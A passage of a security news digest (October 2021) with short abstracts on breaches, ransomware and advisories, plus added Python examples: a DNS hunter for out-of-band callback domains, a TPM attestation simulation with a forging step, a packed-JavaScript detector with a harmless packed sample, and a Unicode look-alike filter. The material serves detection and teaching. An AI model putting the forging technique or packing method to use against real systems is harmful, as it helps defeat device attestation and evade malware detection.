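2021-10-20T10:00:00Z 10.0.0.5  www.example.com A
2021-10-20T10:00:03Z 10.0.0.21 c8q2kd0h3pl1r9tf6vb4nw7ym5zx2ag.oast.fun A
2021-10-20T10:00:03Z 10.0.0.21 c8q2kd0h3pl1r9tf6vb4nw7ym5zx2ag.oast.fun AAAA
2021-10-20T10:00:09Z 10.0.0.21 k1m4p7s0v3y6b9e2h5j8n1q4t7w0z3c.interact.sh A
2021-10-20T10:01:30Z 10.0.0.5  mail.example.com MX
"""


def split_qname(qname):
    """Return (apex, subdomain) for a query name, assuming two-label apexes:
    "abc.oast.fun." -> ("oast.fun", "abc")."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def hunt_oob_callbacks(log_text, apexes=OOB_APEXES):
    """Map each internal client that resolved a known OOB apex to the unique
    payload labels it looked up: {client_ip: {apex: [labels...]}}.
    Repeated lookups (A then AAAA) collapse into one label."""
    hits = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, _qtype = line.split()
        apex, sub = split_qname(qname)
        if apex in apexes and sub:  # a bare apex lookup carries no payload ID
            hits[client][apex].add(sub)
    return {c: {a: sorted(s) for a, s in d.items()} for c, d in hits.items()}


if __name__ == "__main__":
    for client, by_apex in hunt_oob_callbacks(SAMPLE_DNS_LOG).items():
        for apex, labels in by_apex.items():
            print(f"{client} resolved {len(labels)} unique label(s) under {apex}")
```

The label is the pivot: the same random string was carried in the attacker's request (a header, parameter or log-injected field) to the host that resolved it, so searching web and application logs for it points at the vulnerable entry point. Hunting a fixed apex list misses attackers who self-host the server; pair it with a rare-apex or long-random-first-label heuristic on the same log.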
October 20, 2021 – Government
House passes bills to secure telecommunications infrastructure Full Text
Abstract
The House on Wednesday approved multiple bipartisan bills aimed at securing U.S. telecommunications systems against foreign interference, in particular against threats from China.The Hill
October 20, 2021 – General
OWASP’s 2021 List Shuffle: A New Battle Plan and Primary Foe Full Text
Abstract
Code injection attacks, the infamous king of vulnerabilities, have lost the top spot to broken access control as the worst of the worst, and developers need to take notice. In this increasingly chaotic world, there have always been a few constants that people could reliably count on: The sun will rise in the morning and set again at night, Mario will always be cooler than Sonic the Hedgehog, and code injection attacks will always occupy the top spot on the Open Web Application Security Project (OWASP) list of the top ten most common and dangerous vulnerabilities that attackers are actively exploiting. Well, the sun will rise tomorrow, and Mario still has "one-up" on Sonic, but code injection attacks have fallen out of the number one spot on the infamous OWASP list, refreshed in 2021. One of the oldest forms of attacks, code injection vulnerabilities have been around almost as long as computer networking. The blanket vulnerability is responsible for a wide range of attacks, incluThe Hacker News
October 20, 2021 – Botnet
PurpleFox botnet variant uses WebSockets for more secure C2 communication Full Text
Abstract
Researchers warn of a new evolution of the PurpleFox botnet: its operators have added new exploits and leverage WebSockets for C2 communication. Researchers from Trend Micro have documented a recent evolution of the PurpleFox botnet, the experts discovered...Security Affairs
October 20, 2021 – Vulnerabilities
Political-themed actor using old MS Office flaw to drop multiple RATs Full Text
Abstract
A novel threat actor with unclear motives has been discovered running a crimeware campaign which delivers multiple Windows and Android RATs (remote access tools) through the exploitation of CVE-2017-11882.BleepingComputer
October 20, 2021 – Criminals
REvil Disappears Once Again Full Text
Abstract
The Tor payment portal and data leak site of REvil was sent to oblivion after an unknown hacker using the same private keys hijacked the group’s domains. This is the second time that REvil has shut down its operations. Still, organizations should stay protected from such threats by keeping a reliab ...Cyware Alerts - Hacker News
October 20, 2021 – Government
Senate Republicans raise concerns about TSA cyber directives for rail, aviation Full Text
Abstract
Republican leaders and members of the Senate Commerce Committee on Wednesday raised concerns about the timeline and lack of public input involved in recently announced cybersecurity directives for the rail and aviation sectors.The Hill
October 20, 2021 – Breach
LightBasin Hackers Breach at Least 13 Telecom Service Providers Since 2019 Full Text
Abstract
A highly sophisticated adversary named LightBasin has been identified as behind a string of attacks targeting the telecom sector with the goal of collecting "highly specific information" from mobile communication infrastructure, such as subscriber information and call metadata. "The nature of the data targeted by the actor aligns with information likely to be of significant interest to signals intelligence organizations," researchers from cybersecurity firm CrowdStrike said in an analysis published Tuesday. Known to be active as far back as 2016, LightBasin (aka UNC1945) is believed to have compromised 13 telecommunication companies across the world since 2019 by leveraging custom tools and their extensive knowledge of telecommunications protocols for scything through organizations' defenses. The identities of the targeted entities were not disclosed, nor did the findings link the cluster's activity to a specific country. Indeed, a recent incident inThe Hacker News
October 20, 2021 – Breach
Acer suffers a second data breach in a week Full Text
Abstract
Tech giant Acer was hacked again within a few days: after the compromise of its servers in India, threat actors also breached some of its systems in Taiwan. Tech giant Acer was hacked twice in a week, the same threat actor (Desorden) initially breached...Security Affairs
October 20, 2021 – Attack
Google: YouTubers’ accounts hijacked with cookie-stealing malware Full Text
Abstract
Google says YouTube creators have been targeted with password-stealing malware in phishing attacks coordinated by financially motivated threat actors since at least late 2019.BleepingComputer
October 20, 2021 – Breach
Centre for Computing History apologises for data breach Full Text
Abstract
The Centre for Computing History (CCH) in Cambridge, England, has apologised for an "embarrassing" breach in its online customer datafile, though thankfully no payment card information was exposed.The Register
October 20, 2021 – Hacker
Major Russian hacking group linked to ransomware attack on Sinclair: report Full Text
Abstract
A well-known Russian hacking group previously sanctioned by the United States is behind the crippling ransomware attack on Sinclair Broadcast Group that is continuing to impact news stations across the country, according to a new report.The Hill
October 20, 2021 – Vulnerabilities
Microsoft Warns of New Security Flaw Affecting Surface Pro 3 Devices Full Text
Abstract
Microsoft has published a new advisory warning of a security bypass vulnerability affecting Surface Pro 3 convertible laptops that could be exploited by an adversary to introduce malicious devices within enterprise networks and defeat the device attestation mechanism. Tracked as CVE-2021-42299 (CVSS score: 5.6), the issue has been codenamed "TPM Carte Blanche" by Google software engineer Chris Fenner, who is credited with discovering and reporting the attack technique. As of writing, other Surface devices, including the Surface Pro 4 and Surface Book, have been deemed unaffected, although other non-Microsoft machines using a similar BIOS may be vulnerable. "Devices use Platform Configuration Registers (PCRs) to record information about device and software configuration to ensure that the boot process is secure," the Windows maker noted in a bulletin. "Windows uses these PCR measurements to determine device health. A vulnerable device can masquerade asThe Hacker News
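The attestation mechanism Microsoft's bulletin refers to rests on one property of a PCR: it can only be extended, never rewound, so a verifier that knows the expected final value can tell a measured boot from a tampered one. The simulation below is an added example (not Microsoft's or Chris Fenner's code) of that extend chain and of the general failure mode a practitioner should check for: a PCR bank that firmware never extends still sits at its reset value, so any later code with TPM access can replay the expected measurements into it and reproduce the "healthy" value. It illustrates the mechanism only; it does not reproduce the specific Surface Pro 3 defect, which the item above does not detail. The event log entries are constructed stand-ins, and a real verifier checks a signed quote and the full event log, not just the final PCR value.

```python
import hashlib

PCR_RESET = bytes(32)  # a SHA-256 PCR reads as 32 zero bytes after TPM reset


def pcr_extend(pcr, digest):
    """TPM2_PCR_Extend on the SHA-256 bank: new = SHA-256(old || digest).
    One-way: a value can be extended further, never set or rewound."""
    return hashlib.sha256(pcr + digest).digest()


def measure(events, start=PCR_RESET):
    """Replay an event log into a PCR, extending each event's SHA-256 in order."""
    pcr = start
    for event in events:
        pcr = pcr_extend(pcr, hashlib.sha256(event).digest())
    return pcr


# Constructed, simplified stand-in for a firmware measured-boot event log
# (illustrative labels, not real TCG event types or Surface firmware values).
GOLDEN_BOOT_LOG = [
    b"SecureBoot=1",
    b"PK/KEK/db contents",
    b"bootmgr.efi authenticated",
    b"winload.efi authenticated",
]
GOLDEN_PCR = measure(GOLDEN_BOOT_LOG)


def attest_healthy(reported_pcr, golden=GOLDEN_PCR):
    """Verifier side: 'healthy' means the reported PCR equals the known-good value."""
    return reported_pcr == golden


def tampered_boot():
    """A real boot with Secure Boot switched off measures to a different value."""
    return measure([b"SecureBoot=0"] + GOLDEN_BOOT_LOG[1:])


def forge_from_os(bank_value_after_firmware, golden_events=GOLDEN_BOOT_LOG):
    """What OS-level code with TPM access can do: extend, nothing else.
    If firmware left the bank untouched (still PCR_RESET), replaying the golden
    events reproduces the golden PCR exactly; if firmware did measure, it cannot."""
    return measure(golden_events, start=bank_value_after_firmware)


if __name__ == "__main__":
    print("golden boot healthy:      ", attest_healthy(GOLDEN_PCR))
    print("tampered boot healthy:    ", attest_healthy(tampered_boot()))
    print("forged on unmeasured bank:", attest_healthy(forge_from_os(PCR_RESET)))
    print("forged on measured bank:  ", attest_healthy(forge_from_os(tampered_boot())))
```

The practical check this suggests: when onboarding a device model for health attestation, confirm that every PCR bank the verifier will trust is actually extended by firmware on that model (the value at OS hand-off must differ from the reset value), and that the verifier's expected values were derived from a firmware-measured boot rather than from whatever the OS reported.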
October 20, 2021 – Hacker
China-linked LightBasin group accessed calling records from telcos worldwide Full Text
Abstract
China-linked cyberespionage group LightBasin hacked mobile telephone networks around the world and used specialized tools to access calling records. A China-linked hacking group, tracked as LightBasin (aka UNC1945), hacked mobile telephone networks...Security Affairs
October 20, 2021 – Attack
New Gummy Browsers attack lets hackers spoof tracking profiles Full Text
Abstract
University researchers in the US have developed a new fingerprint capturing and browser spoofing attack called Gummy Browsers. They warn how easy the attack is to carry out and the severe implications it can have.BleepingComputer
October 20, 2021 – APT
Lyceum Group Updates its Arsenal With New Tricks and Tools Full Text
Abstract
The lesser-known Lyceum APT seems to be on a mission to gain a foothold with its re-appearance. The gang has been associated with an attack campaign launched against entities in Tunisia. Similarities between Lyceum and the infamous DNSpionage campaign, a cluster of activity linked to the ...Cyware Alerts - Hacker News
October 20, 2021 – Government
Commerce Department cracks down on sale of hacking products to foreign governments Full Text
Abstract
The Commerce Department on Wednesday took steps to crack down on the sale of certain hacking products used by foreign governments and other groups to surveil and repress individuals.The Hill
October 20, 2021 – Vulnerabilities
Zerodium is looking for zero-day exploits in ExpressVPN, NordVPN, and Surfshark Windows VPN clients Full Text
Abstract
Zero-day exploit broker Zerodium announced it is looking for zero-day vulnerabilities in the Windows clients of ExpressVPN, NordVPN, and Surfshark. Zerodium is looking to pay for zero-day exploits for vulnerabilities in the Windows clients of three...Security Affairs
October 20, 2021 – Insider Threat
Microsoft 365 will get enhanced insider risk management tools Full Text
Abstract
Microsoft is updating Microsoft 365 to allow admins to better manage insider security threats in their environments with improvements to risky activity detection and visibility.BleepingComputer
October 20, 2021 – Hacker
Hackers are Disguising Malicious JavaScript Code Using Packers to Bypass Signature-based Detection Systems Full Text
Abstract
Packers work by compressing or encrypting code to make that code unreadable and non-debuggable — resulting in 'obfuscated' code that is difficult for antivirus to detect.ZDNet
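Since a packer's whole purpose is to deny a signature engine a stable byte pattern in the payload, a practical complement is to flag the packing itself: the unpacking stub, the dynamic-evaluation calls it needs, and the statistical shape of the encoded blob. The scorer below is an added example (not ZDNet's or the cited study's code) that computes those features over two constructed JavaScript samples, one ordinary and one in the output format of the widely used Dean Edwards /packer/. The thresholds and the second signature pattern are assumptions to tune against your own corpus.

```python
import math
import re
from collections import Counter

# Constructed samples (not from any real site or malware family).
BENIGN_JS = """\
function greet(name) {
  const el = document.getElementById("greeting");
  el.textContent = "Hello, " + name + "!";
}
document.addEventListener("DOMContentLoaded", function () { greet("world"); });
"""

# Dean Edwards /packer/ output shape: an eval() over an unpacking stub that
# re-inflates a tokenised payload. The payload here is a trivial alert().
PACKED_JS = r"""eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0 1(){2(\'3 4\')}',5,5,'function|hi|alert|hello|world'.split('|'),0,{}))"""

PACKER_SIGNATURES = [
    re.compile(r"eval\(function\(p,a,c,k,e,[dr]\)"),            # Dean Edwards /packer/ stub
    re.compile(r"String\.fromCharCode\((?:\s*\d+\s*,){8,}"),    # long char-code array (assumed heuristic)
]
DYNAMIC_EVAL = re.compile(r"\b(eval|Function|unescape|atob)\s*\(")
ESCAPES = re.compile(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
STRING_LITERAL = re.compile(r"'[^']*'|\"[^\"]*\"")


def shannon_entropy(text):
    """Bits per character; encoded/compressed blobs sit well above plain source."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def obfuscation_features(src):
    return {
        "entropy": shannon_entropy(src),
        "dynamic_eval": len(DYNAMIC_EVAL.findall(src)),
        "escape_density": len(ESCAPES.findall(src)) / max(len(src), 1),
        "packer_signature": any(p.search(src) for p in PACKER_SIGNATURES),
        "longest_string": max((len(m) for m in STRING_LITERAL.findall(src)), default=0),
    }


def is_likely_obfuscated(src, entropy_threshold=5.2):
    """Weighted score over the features; returns (verdict, features)."""
    f = obfuscation_features(src)
    score = 3 if f["packer_signature"] else 0
    score += min(f["dynamic_eval"], 2)              # 1 point per eval-like call, capped
    score += 1 if f["entropy"] > entropy_threshold else 0
    score += 1 if f["escape_density"] > 0.02 else 0
    score += 1 if f["longest_string"] > 200 else 0
    return score >= 3, f


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_JS), ("packed", PACKED_JS)):
        verdict, feats = is_likely_obfuscated(sample)
        print(f"{label}: obfuscated={verdict} entropy={feats['entropy']:.2f} "
              f"eval={feats['dynamic_eval']} packer={feats['packer_signature']}")
```

The packed sample trips the stub signature and the eval count; the benign one scores zero. Legitimate minified bundles also raise entropy and string length, so the stub and eval-chain signals should carry most of the weight, and anything flagged here still needs the payload unpacked (sandboxed execution or a deobfuscator) before a signature engine can judge it.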
October 20, 2021 – Attack
Google says Russian-speaking hackers hijacked YouTube channels for cryptocurrency scam Full Text
Abstract
Google on Wednesday reported it has tracked and disrupted an email phishing campaign tied to Russian-speaking hackers that has targeted YouTube users since 2019 as part of a cryptocurrency scam effort.The Hill
October 20, 2021 – Botnet
New PurpleFox botnet variant uses WebSockets for C2 communication Full Text
Abstract
The PurpleFox botnet has refreshed its arsenal with new vulnerability exploits and dropped payloads, now also leveraging WebSockets for C2 bidirectional communication.BleepingComputer
October 20, 2021 – Ransomware
Yanluowang: New Player in the Ransomware Scene Full Text
Abstract
Symantec uncovered a new strain of ransomware, dubbed Yanluowang, targeting virtual machines in enterprises. The attackers behind the ransomware have used the genuine AdFind command line Active Directory query tool. Hackers further warned not to approach law enforcement for help.Cyware Alerts - Hacker News
October 20, 2021 – Attack
New Stealth Phishing Campaign Targets Financial Organizations Full Text
Abstract
Morphisec Labs unearthed a new MirrorBlast campaign aimed at financial services across Canada, the U.S., Europe, Hong Kong, and others. The campaign has an uncanny resemblance to the Russia-based TA505 group. Organizations must protect themselves with adequate protection solutions, such as anti-phi ...Cyware Alerts - Hacker News
October 20, 2021 – Vulnerabilities
PoC Exploit that Bypasses macOS Security is Out and Being Exploited Full Text
Abstract
Experts found a PoC exploit for a macOS Gatekeeper bypass flaw that was being exploited in the wild. Tracked as CVE-2021-1810, the vulnerability abuses the way in which Archive Utility handles file paths on macOS systems. If malware bypasses this, it could be a massive compromise for a targete ...Cyware Alerts - Hacker News
October 19, 2021 – APT
Fresh APT Harvester Reaps Telco, Government Data Full Text
Abstract
The group is likely nation-state-backed and is mounting an ongoing spy campaign using custom malware and stealthy tactics.Threatpost
October 19, 2021 – APT
Lyceum APT Returns, This Time Targeting Tunisian Firms Full Text
Abstract
The APT, which targets Middle-Eastern energy firms & telecoms, has been relatively quiet since its exposure but not entirely silent. It’s kept up attacks through 2021 and is working on retooling its arsenal yet again.Threatpost
October 19, 2021 – Criminals
Feds Warn BlackMatter Ransomware Gang is Poised to Strike Full Text
Abstract
An advisory by CISA, the FBI and the NSA reveals hallmark tactics of, and shares defense tips against, the cybercriminal group that’s picked up where its predecessor DarkSide left off.Threatpost
October 19, 2021 – Vulnerabilities
Zerodium wants zero-day exploits for Windows VPN clients Full Text
Abstract
In a short tweet today, exploit broker Zerodium said that it is looking to acquire zero-day exploits for vulnerabilities in three popular virtual private network (VPN) service providers on the market.BleepingComputer
October 19, 2021 – Vulnerabilities
PurpleFox Adds New Vulnerability Exploit, Rootkit Capabilities, and .NET Backdoor Full Text
Abstract
The new backdoor leverages WebSockets to communicate with its command-and-control (C&C) servers, resulting in a more robust and secure means of communication compared to regular HTTP traffic.Trend Micro
October 19, 2021 – Hacker
Potential Chinese hackers targeting telecommunications companies Full Text
Abstract
Hackers potentially linked to China are continuously targeting the telecommunications sector, a report released Tuesday by cybersecurity company CrowdStrike found.The Hill
October 19, 2021 – Vulnerabilities
Squirrel Engine Bug Could Let Attackers Hack Games and Cloud Services Full Text
Abstract
Researchers have disclosed an out-of-bounds read vulnerability in the Squirrel programming language that can be abused by attackers to break out of the sandbox restrictions and execute arbitrary code within a SquirrelVM, thus giving a malicious actor complete access to the underlying machine. Tracked as CVE-2021-41556, the issue occurs when a game library referred to as Squirrel Engine is used to execute untrusted code and affects stable release branches 3.x and 2.x of Squirrel. The vulnerability was responsibly disclosed on August 10, 2021. Squirrel is an open-source, object-oriented programming language that's used for scripting video games as well as in IoT devices and distributed transaction processing platforms such as Enduro/X. "In a real-world scenario, an attacker could embed a malicious Squirrel script into a community map and distribute it via the trusted Steam Workshop," researchers Simon Scannell and Niklas Breitfeld said in a report shared withThe Hacker News
October 19, 2021 – Ransomware
Experts found many similarities between the new Karma Ransomware and Nemty variants Full Text
Abstract
Sentinel Labs experts have analyzed the new Karma ransomware and speculate it represents an evolution of the Nemty ransomware operation. Karma ransomware is a new threat that was first spotted in June of 2021, it is important to distinguish it from...Security Affairs
October 19, 2021 – Vulnerabilities
Squirrel Bug Lets Attackers Execute Code in Games, Cloud Services Full Text
Abstract
The out-of-bounds read vulnerability enables an attacker to escape a Squirrel VM in games with millions of monthly players – such as Counter-Strike: Global Offensive and Portal 2 – and in cloud services such as Twilio Electric Imp.Threatpost
October 19, 2021 – Solution
Brave ditches Google for its own privacy-centric search engine Full Text
Abstract
Brave Browser has replaced Google with its own no-tracking privacy-centric Brave Search as the default search engine for new users in five regions.BleepingComputer
October 19, 2021 – Business
SASE Firm Cato Networks Raises $200 Million at $2.5 Billion Valuation Full Text
Abstract
The latest funding round was led by Lightspeed Venture Partners, with participation from Greylock, Aspect Ventures / Acrew Capital, Coatue, Singtel Innov8, and Shlomo Kramer.Security Week
October 19, 2021 – General
Keeping the world’s focus on cyber Full Text
Abstract
Christopher Painter, a former coordinator for cyber issues at the State Department under both the Obama and Trump administrations, says greater international engagement is required to face down malicious nations and cybercriminals alike.The Hill
October 19, 2021 – Malware
A New Variant of FlawedGrace Spreading Through Mass Email Campaigns Full Text
Abstract
Cybersecurity researchers on Tuesday took the wraps off a mass volume email attack staged by a prolific cybercriminal gang affecting a wide range of industries, with one of its region-specific operations notably targeting Germany and Austria. Enterprise security firm Proofpoint tied the malware campaign with high confidence to TA505 , which is the name assigned to the financially motivated threat group that's been active in the cybercrime business since at least 2014, and is behind the infamous Dridex banking trojan and other arsenals of malicious tools such as FlawedAmmyy, FlawedGrace, Neutrino botnet, and Locky ransomware, among others. The attacks are said to have started as a series of low-volume email waves, delivering only several thousand messages in each phase, before ramping up in late September and as recently as October 13, resulting in tens to hundreds of thousands of emails. "Many of the campaigns, especially the large volume ones, strongly resemble the hisThe Hacker News
October 19, 2021 – Hacker
Symantec uncovered a previously unknown nation-state actor, named Harvester, that targeted telcos Full Text
Abstract
Symantec spotted a previously unknown nation-state actor, tracked as Harvester, that is targeting telecommunication providers and IT firms in South Asia. Symantec spotted a previously unknown nation-state actor, tracked as Harvester, that is using...Security Affairs
October 19, 2021 – Education
A Guide to Doing Cyberintelligence on a Restricted Budget Full Text
Abstract
Cybersecurity budget cuts are everywhere. Chad Anderson, senior security researcher at DomainTools, discusses alternatives to fancy tooling, and good human skills alignment.Threatpost
October 19, 2021 – Attack
Acer hacked twice in a week by the same threat actor Full Text
Abstract
Acer has suffered a second cyberattack in just a week by the same hacking group that says other regions are vulnerable.BleepingComputer
October 19, 2021 – Criminals
Analysis: Top Ransomware Gangs Targeting Healthcare Sector Full Text
Abstract
Ransomware attacks are continuing to threaten the U.S. and global healthcare sectors, in part due to many entities' high dependency on legacy systems and lack of security resources, according to HC3.Gov Info Security
October 19, 2021 – Government
FBI, CISA, NSA published a joint advisory on BlackMatter ransomware operations Full Text
Abstract
FBI, CISA, and NSA have published a joint advisory about the operation of the BlackMatter ransomware gang that provides defense recommendations. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI),...Security Affairs
October 19, 2021 – General
About 26% of all malicious JavaScript threats are obfuscated Full Text
Abstract
A research that analyzed over 10,000 samples of diverse malicious software written in JavaScript concluded that roughly 26% of it is obfuscated to evade detection and analysis.BleepingComputer
October 19, 2021 – General
On Track for Fifth Record Year in a Row for Vulnerabilities Full Text
Abstract
With 15,080 vulnerabilities (2,957 high, 9,737 medium and 2,386 low) recorded as of October 14, 2021, we’re on track to mark a fifth record year of vulnerabilities discovered in production code.k2io
October 19, 2021 – Ransomware
Trustwave released a free decryptor for the BlackByte ransomware Full Text
Abstract
Trustwave’s SpiderLabs researchers have released a free decryptor that allows victims of the BlackByte ransomware to recover their files.Security Affairs
October 19, 2021 – Ransomware
BlackByte ransomware decryptor released to recover files for free Full Text
Abstract
A free decryptor for the BlackByte ransomware has been released, allowing past victims to recover their files for free.BleepingComputer
October 19, 2021 – Criminals
LightBasin hacking group breaches 13 global telecoms in two years Full Text
Abstract
A group of hackers that security researchers call LightBasin has been compromising mobile telecommunication systems across the world for the past five years.BleepingComputer
October 19, 2021 – Policy and Law
Man gets 7 years in prison for hacking 65K health care employees Full Text
Abstract
Justin Sean Johnson, also known as TheDearthStar and Dearthy Star, was sentenced this week to seven years in prison for the 2014 hack of the health care provider and insurer University of Pittsburgh Medical Center (UPMC).BleepingComputer
October 19, 2021 – Government
FBI warns of fake govt sites used to steal financial, personal data Full Text
Abstract
The FBI warned the US public that threat actors actively use fake and spoofed unemployment benefit websites to harvest sensitive financial and personal information from unsuspecting victims.BleepingComputer
October 19, 2021 – Criminals
New Karma ransomware group likely a Nemty rebrand Full Text
Abstract
Threat analysts at Sentinel Labs have found evidence of the Karma ransomware being just another evolutionary step in the strain that started as JSWorm, became Nemty, then Nefilim, Fusion, Milihpen, and most recently, Gangbang.BleepingComputer
October 19, 2021 – Vulnerabilities
Microsoft issues advisory for Surface Pro 3 TPM bypass vulnerability Full Text
Abstract
Microsoft has published an advisory regarding a security feature bypass vulnerability impacting Surface Pro 3 tablets which could allow threat actors to introduce malicious devices within enterprise environments.BleepingComputer
October 18, 2021 – Hacker
Cybersecurity Experts Warn of a Rise in Lyceum Hacker Group Activities in Tunisia Full Text
Abstract
A threat actor, previously known for striking organizations in the energy and telecommunications sectors across the Middle East as early as April 2018, has evolved its malware arsenal to strike two entities in Tunisia. Security researchers at Kaspersky, who presented their findings at the VirusBulletin VB2021 conference earlier this month, attributed the attacks to a group tracked as Lyceum (aka Hexane), which was first publicly documented in 2019 by Secureworks. "The victims we observed were all high-profile Tunisian organizations, such as telecommunications or aviation companies," researchers Aseel Kayal, Mark Lechtik, and Paul Rascagneres detailed . "Based on the targeted industries, we assume that the attackers might have been interested in compromising such entities to track the movements and communications of individuals of interest to them." Analysis of the threat actor's toolset has shown that the attacks have shifted from leveraging a combinatThe Hacker News
October 18, 2021 – Education
Time to Build Accountability Back into Cybersecurity Full Text
Abstract
Chris Hass, director of information security and research at Automox, discusses how to assign security responsibility, punishment for poor cyber-hygiene and IDing ‘security champions’ to help small businesses.Threatpost
October 18, 2021 – Attack
Sinclair Confirms Ransomware Attack That Disrupted TV Stations Full Text
Abstract
A major cyberattack resulted in data being stolen, too, but Sinclair’s not sure which information is now in the hands of the crooks.Threatpost
October 18, 2021 – Government
FBI, CISA, NSA share defense tips for BlackMatter ransomware attacks Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) published today an advisory with details about how the BlackMatter ransomware gang operates.BleepingComputer
October 18, 2021 – Hacker
How Attackers Used Math Symbols to Evade Detection Full Text
Abstract
Experts reported a phishing campaign impersonating Verizon that uses mathematical symbols in place of letters to slip past anti-phishing filters and harvest users’ Office 365 credentials. The spoofed messages pretend to be a voicemail notification with an embedded Play button. The recent campaign reflects how ... Read MoreCyware Alerts - Hacker News
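The evasion described above works because a brand-detection filter matches on the literal string while the rendered text still reads as the brand name. The following Python snippet is an added example, not code from the article or from the researchers who reported the campaign. It folds Unicode compatibility characters (such as mathematical bold letters) to ASCII with NFKC, then applies a small, constructed look-alike table for symbols like the square root sign that have no compatibility decomposition, and reports brands that surface only after folding. The brand list, the confusables table and the sample message bodies are assumptions made for the demonstration.

```python
import unicodedata

# Constructed look-alike table (an assumption for this example, not from the
# article): math symbols that render like Latin letters but have no Unicode
# compatibility decomposition, so NFKC alone will not fold them.
CONFUSABLES = {
    "\u221a": "v",  # SQUARE ROOT
    "\u2228": "v",  # LOGICAL OR
    "\u22bd": "v",  # NOR
    "\u2208": "e",  # ELEMENT OF
}

# Brands the filter should recognise; assumed list for the demonstration.
WATCHED_BRANDS = ("verizon", "office 365", "microsoft")


def normalize_text(text: str) -> str:
    """Fold text the way a reader perceives it.

    NFKC maps compatibility characters such as mathematical bold letters
    (U+1D400 block) to plain ASCII; the confusables table then handles
    symbols that only look like letters. casefold() makes the later
    comparison case-insensitive.
    """
    folded = unicodedata.normalize("NFKC", text)
    folded = "".join(CONFUSABLES.get(ch, ch) for ch in folded)
    return folded.casefold()


def find_obfuscated_brands(text: str, brands=WATCHED_BRANDS) -> list:
    """Return brands that appear only after normalization.

    A brand present in the raw text is ordinary copy; a brand that surfaces
    only once look-alike symbols are folded is the evasion pattern.
    """
    raw = text.casefold()
    folded = normalize_text(text)
    return sorted(b for b in brands if b in folded and b not in raw)


# Constructed sample message bodies (not taken from the campaign).
SAMPLES = {
    # square root sign standing in for the leading "v"
    "sqrt_logo": "\u221aerizon: you have a new voicemail. Press Play to listen.",
    # the brand spelled entirely in mathematical bold letters
    "math_bold": "\U0001D415\U0001D41E\U0001D42B\U0001D422\U0001D433"
                 "\U0001D428\U0001D427 voicemail notification",
    # legitimate spelling: found in the raw text, so not reported
    "plain": "Verizon Wireless voicemail notification",
}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:10s} -> {find_obfuscated_brands(body)}")
```

The confusables table is deliberately small; a production filter would use the Unicode confusables data rather than a hand-written map, and would run the same folding over the HTML alt text and link text, where the campaign placed the symbols.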
October 18, 2021 – Ransomware
Agencies say agriculture groups being targeted by BlackMatter ransomware Full Text
Abstract
A trio of federal agencies on Monday sounded the alarm about critical infrastructure groups, particularly agricultural organizations, being targeted by a prolific ransomware group.The Hill
October 18, 2021 – Education
Why Database Patching Best Practice Just Doesn’t Work and How to Fix It Full Text
Abstract
Patching really, really matters – patching is what keeps technology solutions from becoming like big blocks of Swiss cheese, with endless security vulnerabilities punching hole after hole into critical solutions. But anyone who's spent any amount of time maintaining systems will know that patching is often easier said than done. Yes, in some instances, you can just run a command line to install that patch, and that's it. These instances are increasingly rare though – given the complexity of the technology environment, you're more likely faced with a complex process to achieve patching best practice. In this article, we'll outline why database patching matters (yes, databases are vulnerable too!), explain what the problem is with patching databases, and point to a novel solution that takes the pain out of database patching. Watch out – your database services are vulnerable too. We know that database services are critical – databases underpin IT operations in countleThe Hacker News
October 18, 2021 – Hacker
TeamTNT Deploys Malicious Docker Image On Docker Hub Full Text
Abstract
The Uptycs Threat Research Team spotted a campaign in which the TeamTNT threat actors deployed a malicious container image on Docker Hub.Security Affairs
October 18, 2021 – General
Podcast: Could the Zoho Flaw Trigger SolarWinds 2.0? Full Text
Abstract
Companies are worried that the highly privileged password app could let attackers deep inside an enterprise’s footprint, says Redscan’s George Glass.Threatpost
October 18, 2021 – Breach
State-backed hackers breach telcos with custom malware Full Text
Abstract
A previously unknown state-sponsored actor is deploying a novel toolset in attacks targeting telecommunication providers and IT firms in South Asia.BleepingComputer
October 18, 2021 – Hacker
Chinese Actors Use MysterySnail RAT to Exploit Windows Zero-day Full Text
Abstract
Kaspersky unearthed a cyberespionage campaign exploiting a zero-day flaw in Windows to deliver MysterySnail malware and steal data. A connection to a Chinese-speaking APT was also established. Experts recommend organizations stay proactive and ready with adequate security measures.Cyware Alerts - Hacker News
October 18, 2021 – Attack
Sinclair Broadcast Group hit by ransomware attack Full Text
Abstract
Sinclair Broadcast Group, one of the nation’s largest television station operators, announced Monday that it had been hit by a ransomware attack over the weekend that resulted in data theft and network disruption.The Hill
October 18, 2021 – General
Over 30 Countries Pledge to Fight Ransomware Attacks in US-led Global Meeting Full Text
Abstract
Representatives from the U.S., the European Union, and 30 other countries pledged to mitigate the risk of ransomware and harden the financial system from exploitation with the goal of disrupting the ecosystem, calling it an "escalating global security threat with serious economic and security consequences." "From malign operations against local health providers that endanger patient care, to those directed at businesses that limit their ability to provide fuel, groceries, or other goods to the public, ransomware poses a significant risk to critical infrastructure, essential services, public safety, consumer protection and privacy, and economic prosperity," officials said in a statement released last week. To that end, efforts are expected to be made to enhance network resilience by adopting cyber hygiene good practices, such as using strong passwords, securing accounts with multi-factor authentication, maintaining periodic offline data backups, keeping softwaThe Hacker News
October 18, 2021 – Vulnerabilities
Prometheus endpoint unprotected installs could expose sensitive data Full Text
Abstract
JFrog researchers discovered multiple unprotected installs of the open source event monitoring solution Prometheus that may expose sensitive data.Security Affairs
October 18, 2021 – Attack
Suspected Chinese hackers behind attacks on ten Israeli hospitals Full Text
Abstract
A joint announcement from the Ministry of Health and the National Cyber Directorate in Israel describes a spike in ransomware attacks over the weekend that targeted the systems of nine health institutes in the country.BleepingComputer
October 18, 2021 – Hacker
